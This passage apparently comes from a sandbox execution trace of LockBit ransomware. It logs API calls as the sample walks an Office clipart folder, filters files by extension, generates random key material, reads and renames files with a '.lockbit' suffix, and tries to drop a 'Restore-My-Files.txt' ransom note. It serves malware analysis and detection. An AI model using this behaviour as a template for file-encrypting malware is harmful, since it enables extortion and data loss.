returned -1 [0152.228] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.228] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215070.WMF.lockbit") returned 72 [0152.228] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215070.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215070.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0152.229] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.229] malloc (_Size=0x40068) returned 0x3df0008 [0152.229] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11628) returned 1 [0152.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0152.230] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0152.230] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0152.248] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215070.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215070.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.248] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.248] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.249] free (_Block=0x1fa2ed8) [0152.249] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215070.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.249] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.249] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.249] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2209e400, ftCreationTime.dwHighDateTime=0x1be1b5b, ftLastAccessTime.dwLowDateTime=0x565a9290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2209e400, ftLastWriteTime.dwHighDateTime=0x1be1b5b, nFileSizeHigh=0x0, nFileSizeLow=0x1f50, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0215076.WMF", cAlternateFileName="")) returned 1 [0152.249] lstrcmpiW (lpString1=".", lpString2="J0215076.WMF") returned -1 [0152.250] lstrcmpiW (lpString1="..", lpString2="J0215076.WMF") returned -1 [0152.250] PathFindExtensionW (pszPath="J0215076.WMF") returned=".WMF" [0152.250] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.250] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.251] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.251] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.252] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.252] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.252] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.252] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.252] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.252] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.252] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0215076.WMF") returned 1 [0152.252] lstrcmpiW (lpString1="ntldr", lpString2="J0215076.WMF") returned 1 [0152.252] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0215076.WMF") returned 1 [0152.252] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0215076.WMF") returned -1 [0152.252] lstrcmpiW (lpString1="autorun.inf", lpString2="J0215076.WMF") returned -1 [0152.252] lstrcmpiW (lpString1="thumbs.db", lpString2="J0215076.WMF") returned 1 [0152.252] lstrcmpiW (lpString1="iconcache.db", lpString2="J0215076.WMF") returned -1 [0152.252] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.252] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215076.WMF") returned=".WMF" [0152.252] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.252] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.252] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.252] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.253] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.254] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.254] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.254] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215076.WMF.lockbit") returned 72 [0152.254] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215076.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215076.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0152.255] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.255] malloc (_Size=0x40068) returned 0x1ff1e60 [0152.255] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8016) returned 1 [0152.255] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0152.256] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0152.256] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.262] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215076.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215076.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.262] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.262] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.264] free (_Block=0x1fa2ed8) [0152.264] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215076.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.264] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.264] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.264] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565a9290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x81ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0215210.WMF", cAlternateFileName="")) returned 1 [0152.264] lstrcmpiW (lpString1=".", lpString2="J0215210.WMF") returned -1 [0152.264] lstrcmpiW (lpString1="..", lpString2="J0215210.WMF") returned -1 [0152.264] PathFindExtensionW (pszPath="J0215210.WMF") returned=".WMF" [0152.264] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.264] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.264] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.264] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.264] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.264] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.264] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.264] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.264] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.264] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.264] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.264] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.265] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.265] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.266] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.266] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.266] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.266] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.266] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.266] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.266] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.266] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.266] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.266] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.266] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.266] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.266] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.266] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0215210.WMF") returned 1 [0152.266] lstrcmpiW (lpString1="ntldr", lpString2="J0215210.WMF") returned 1 [0152.266] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0215210.WMF") returned 1 [0152.266] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0215210.WMF") returned -1 [0152.266] lstrcmpiW (lpString1="autorun.inf", lpString2="J0215210.WMF") returned -1 [0152.266] lstrcmpiW (lpString1="thumbs.db", lpString2="J0215210.WMF") returned 1 [0152.266] lstrcmpiW (lpString1="iconcache.db", lpString2="J0215210.WMF") returned -1 [0152.266] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.267] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215210.WMF") returned=".WMF" [0152.267] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.267] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.267] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.268] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.268] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.268] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.268] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.268] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.268] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.268] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.268] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.268] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.268] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.268] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215210.WMF.lockbit") returned 72 [0152.268] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215210.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215210.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0152.274] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.274] malloc (_Size=0x40068) returned 0x3d70450 [0152.274] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=33230) returned 1 [0152.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0152.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.276] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0152.276] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0152.279] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215210.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215210.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.279] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.279] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.280] free (_Block=0x1fa2ed8) [0152.280] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215210.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.280] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.280] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.281] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x852fb100, ftCreationTime.dwHighDateTime=0x1be4927, ftLastAccessTime.dwLowDateTime=0x6607e0d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x852fb100, ftLastWriteTime.dwHighDateTime=0x1be4927, nFileSizeHigh=0x0, nFileSizeLow=0x244a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0215709.WMF", cAlternateFileName="")) returned 1 [0152.281] lstrcmpiW (lpString1=".", lpString2="J0215709.WMF") returned -1 [0152.281] lstrcmpiW (lpString1="..", lpString2="J0215709.WMF") returned -1 [0152.281] PathFindExtensionW (pszPath="J0215709.WMF") returned=".WMF" [0152.281] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.281] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.281] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.281] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.281] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.281] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.281] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.281] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.281] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.281] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.281] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.281] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.281] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 